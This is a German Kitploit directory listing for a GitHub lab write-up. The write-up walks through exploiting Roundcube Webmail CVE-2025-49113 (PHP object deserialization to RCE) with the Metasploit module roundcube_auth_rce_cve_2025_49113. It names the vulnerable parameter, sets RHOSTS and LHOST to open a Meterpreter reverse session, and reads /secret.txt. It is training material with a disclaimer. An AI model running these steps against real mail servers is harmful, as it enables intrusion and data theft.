Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
roundcube-cve-2025-49113-lab — Praktisches Exploitation-Labor für Roundcube Webmail CVE-2025-49113 (authentifizierte PHP-Objektdeserialisierung → RCE) zum Lesen von /secret.txt. | Kitploit
Tools/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Labs & Praxis
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Praktisches Exploitation-Labor für Roundcube Webmail CVE-2025-49113 (authentifizierte PHP-Objektdeserialisierung → RCE) zum Lesen von /secret.txt.

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

HAFTUNGSAUSSCHLUSS: Nur für Bildungszwecke

Roundcube Webmail RCE – CVE-2025-49113 Lab

Dieses Repository dokumentiert meine schrittweise Ausnutzung von Roundcube Webmail CVE-2025-49113 in einer kontrollierten Laborumgebung, um das in /secret.txt gespeicherte Geheimnis zu erlangen.

⚠️ Haftungsausschluss
Alle Arbeiten wurden gegen eine Labor-/Trainingsumgebung durchgeführt, die ich testen darf.
Verwenden Sie diese Techniken nicht gegen Systeme, die Sie nicht besitzen oder verwalten.


Herausforderung

Roundcube Webmail ist ein browserbasierter Open-Source-PHP-E-Mail-Client, der über IMAP eine Verbindung zu Postfächern herstellt und E-Mails über SMTP versendet. Er läuft üblicherweise auf Apache oder Nginx mit MySQL/PostgreSQL/SQLite und wird häufig in Shared-Hosting-Umgebungen eingesetzt.

Schwachstelle – CVE-2025-49113

Alle Roundcube-Versionen bis einschließlich 1.6.10 (und 1.5.x vor 1.5.10) enthalten einen kritischen Fehler in program/actions/settings/upload.php. Der Parameter _from wird nicht ordnungsgemäß validiert, wodurch ein authentifizierter Angreifer eine unsichere PHP-Objekt-Deserialisierung auslösen und Remote Code Execution mit den Rechten des Webservers erreichen kann.

Lab-Zugangsdaten:

  • Benutzername: roundcube
  • Passwort: rcpass

Ziel:

Wie lautet das Geheimnis in der Datei /secret.txt?


Laborumgebung

  • Angreifer-Host: Kali / HackerBox mit:
    • nmap
    • msfconsole (Metasploit 6)
  • Ziel-Host: Roundcube Webmail auf 172.20.2.57
  • Verwendeter Exploit: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

Vorgehen

Schritt 1 – Dienst-Erkennung mit Nmap

Befehl: nmap -sV Target Machine

Schritt 2 - Einen PHP-Objekt-Deserialisierungs-Exploit in Metasploit finden

search php object deserialization

Schritt 3 - Das Roundcube-Exploit-Modul konfigurieren

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

Schritt 4 - Eine Meterpreter-Sitzung erhalten und /secret.txt lesen

meterpreter > cat /secret.txt

Tool herunterladen